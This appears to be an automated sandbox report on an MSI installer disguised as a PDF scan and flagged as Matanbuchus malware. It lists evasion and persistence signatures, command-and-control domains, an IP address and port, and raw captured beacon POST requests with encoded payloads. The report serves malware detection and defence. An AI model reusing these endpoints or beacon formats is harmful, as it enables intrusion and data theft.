Windows Analysis Report
SCAN-068589.pdf.msi

Overview

General Information

Sample Name: SCAN-068589.pdf.msi
Analysis ID: 647225
MD5: c0ee31bc6536ae8cb7e5d8809676920a
SHA1: b21482d1072e5cb65488f2c181f38c75d8c80dcd
SHA256: 2d8740ea16e9457a358ebea73ad377ff75f7aa9bdf748f0d801f5a261977eda4
Tags: msi
Infos:

Detection

Matanbuchus
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Matanbuchus
System process connects to network (likely due to code injection or exploit)
Uses known network protocols on non-standard ports
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
Adds / modifies Windows certificates
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
PE / OLE file has an invalid certificate
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Creates or modifies windows services
Dropped file seen in connection with other malware
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 213.226.114.15:443 -> 192.168.2.22:49180 version: TLS 1.2
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File opened: c: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E462F53 FindFirstFileExW, 12_2_6E462F53

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: collectiontelemetrysystem.com
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 213.226.114.15 48195 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: telemetrysystemcollection.com
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 49187 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49187
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49189
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49190
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RETN-ASEU RETN-ASEU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /m8YYdu/mCQ2U9/auth.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /m8YYdu/mCQ2U9/home.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 563Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 4d 48 68 78 51 55 5a 4d 64 6b 52 79 52 56 4e 59 64 33 4e 50 64 7a 51 77 52 33 42 6e 62 45 55 31 51 30 51 79 4f 58 70 4f 56 30 64 69 54 30 31 4d 54 31 4e 52 4d 58 64 4c 53 6e 42 6c 59 79 74 4d 53 58 67 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 62 32 74 59 54 6c 46 42 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 45 55 7a 4a 34 49 6a 6f 69 63 6b 56 45 56 55 30 33 4e 6d 59 69 4c 43 4a 46 54 47 6f 69 4f 69 49 7a 61 6c 63 32 55 57 56 4e 50 53 49 73 49 6b 56 76 4e 69 49 36 49 6a 4a 34 54 30 64 48 54 45 74 49 49 69 77 69 52 6e 52 76 49 6a 6f 69 63 6d 63 39 50 53 49 73 49 6b 78 76 63 79 49 36 57 79 49 76 51 58 6c 46 52 6e 41 79 51 6e 52 70 4e 33 64 34 59 31 64 7a 4e 6c 59 79 54 57 31 33 53 6b 46 56 56 54 4e 56 63 6d 39 50 52 45 6c 4a 56 6e 70 6b 51 54 6c 48 64 6e 56 4e 54 6b 6c 6e 50 54 30 69 58 53 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 52 4e 6c 67 32 49 6a 6f 69 4d 6e 70 70 4d 6b 70 4a 56 45 64 79 61 54 51 39 49 69 77 69 56 6e 6f 69 4f 69 49 79 56 54 5a 76 53 6e 49 32 52 6d 31 6e 54 45 45 34 64 6b 4e 53 4c 33 68 78 63 57 64 44 4f 44 6c 49 51 30 74 6d 4c 30 70 4d 52 45 78 4c 52 55 6c 4c 4d 48 42 33 61 58 56 72 50 53 49 73 49 6d 4e 43 52 69 49 36 49 6a 4e 36 5a 6c 70 4f 4b 31 42 48 64 6b 4d 72 59 58 63 31 62 6e 5a 32 4d 57 70 52 4b 32 70 76 50 53 49 73 49 6d 59 78 5a 47 45 69 4f 69 4a 34 61 57 6b 78 55 46 70 58 4b 33 4a 56 52 47 35 33 5a 7a 30 39 49 69 77 69 64 46 63 69 4f 69 4a 78 61 30 78 47 55 6b 39 51 5a 69 49 73 49 6e 64 51 4e 69 49 36 49 6a 64 46 57 47 46 53 5a 6d 35 69 49 69 77 69 65 6d 74 44 4e 79 49 36 49 69 4a 39 Data Ascii: ev=eyIzQ0VrIjoiMHhxQUZMdkRyRVNYd3NPdzQwR3BnbEU1Q0QyOXpOV0diT01MT1NRMXdLSnBlYytMSXgwPSIsIjNmZTExIjoib2tYTlFBPT0iLCIzbTd4IjoiMnhDWkdMaz0iLCJEUzJ4IjoickVEVU03NmYiLCJFTGoiOiIzalc2UWVNPSIsIkVvNiI6IjJ4T0dHTEtIIiwiRnRvIjoicmc9PSIsIkxvcyI6WyIvQXlFRnAyQnRpN3d4Y1dzNlYyTW13SkFVVTNVcm9PRElJVnpkQTlHdnVNTklnPT0iXSwiTlNleURYIjoiMUNlUkNKT3oiLCJRNlg2IjoiMnppMkpJVEdyaTQ9IiwiVnoiOiIyVTZvSnI2Rm1nTEE4dkNSL3hxcWdDODlIQ0tmL0pMRExLRUlLMHB3aXVrPSIsImNCRiI6IjN6ZlpOK1BHdkMrYXc1bnZ2MWpRK2pvPSIsImYxZGEiOiJ4aWkxUFpXK3JVRG53Zz09IiwidFciOiJxa0xGUk9QZiIsIndQNiI6IjdFWGFSZm5iIiwiemtDNyI6IiJ9
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 231Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 231Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 231Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 231Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 231Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 231Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 231Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 4b 59 69 49 36 49 6a 64 42 55 31 4a 42 5a 7a 30 39 49 69 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 57 65 69 49 36 49 6a 4a 56 4e 6d 39 4b 63 6a 5a 47 62 57 64 4d 51 54 68 32 51 31 49 76 65 48 46 78 5a 30 4d 34 4f 55 68 44 53 32 59 76 53 6b 78 45 54 45 74 46 53 55 73 77 63 48 64 70 64 57 73 39 49 69 77 69 59 6b 34 69 4f 69 4a 36 51 57 4d 39 49 69 77 69 59 30 4a 47 49 6a 6f 69 4d 33 70 6d 57 6b 34 72 55 45 64 32 51 79 74 68 64 7a 56 75 64 6e 59 78 61 6c 45 72 61 6d 38 39 49 69 77 69 64 31 41 32 49 6a 6f 69 4e 30 56 59 59 56 4a 6d 62 6d 49 69 66 51 3d 3d Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 213.226.114.15:48195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: regsvr32.exe String found in binary or memory: http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe String found in binary or memory: http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe String found in binary or memory: https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx
Source: unknown HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 563Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 4d 48 68 78 51 55 5a 4d 64 6b 52 79 52 56 4e 59 64 33 4e 50 64 7a 51 77 52 33 42 6e 62 45 55 31 51 30 51 79 4f 58 70 4f 56 30 64 69 54 30 31 4d 54 31 4e 52 4d 58 64 4c 53 6e 42 6c 59 79 74 4d 53 58 67 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 62 32 74 59 54 6c 46 42 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 45 55 7a 4a 34 49 6a 6f 69 63 6b 56 45 56 55 30 33 4e 6d 59 69 4c 43 4a 46 54 47 6f 69 4f 69 49 7a 61 6c 63 32 55 57 56 4e 50 53 49 73 49 6b 56 76 4e 69 49 36 49 6a 4a 34 54 30 64 48 54 45 74 49 49 69 77 69 52 6e 52 76 49 6a 6f 69 63 6d 63 39 50 53 49 73 49 6b 78 76 63 79 49 36 57 79 49 76 51 58 6c 46 52 6e 41 79 51 6e 52 70 4e 33 64 34 59 31 64 7a 4e 6c 59 79 54 57 31 33 53 6b 46 56 56 54 4e 56 63 6d 39 50 52 45 6c 4a 56 6e 70 6b 51 54 6c 48 64 6e 56 4e 54 6b 6c 6e 50 54 30 69 58 53 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 52 4e 6c 67 32 49 6a 6f 69 4d 6e 70 70 4d 6b 70 4a 56 45 64 79 61 54 51 39 49 69 77 69 56 6e 6f 69 4f 69 49 79 56 54 5a 76 53 6e 49 32 52 6d 31 6e 54 45 45 34 64 6b 4e 53 4c 33 68 78 63 57 64 44 4f 44 6c 49 51 30 74 6d 4c 30 70 4d 52 45 78 4c 52 55 6c 4c 4d 48 42 33 61 58 56 72 50 53 49 73 49 6d 4e 43 52 69 49 36 49 6a 4e 36 5a 6c 70 4f 4b 31 42 48 64 6b 4d 72 59 58 63 31 62 6e 5a 32 4d 57 70 52 4b 32 70 76 50 53 49 73 49 6d 59 78 5a 47 45 69 4f 69 4a 34 61 57 6b 78 55 46 70 58 4b 33 4a 56 52 47 35 33 5a 7a 30 39 49 69 77 69 64 46 63 69 4f 69 4a 78 61 30 78 47 55 6b 39 51 5a 69 49 73 49 6e 64 51 4e 69 49 36 49 6a 64 46 57 47 46 53 5a 6d 35 69 49 69 77 69 65 6d 74 44 4e 79 49 36 49 69 4a 39 Data Ascii: 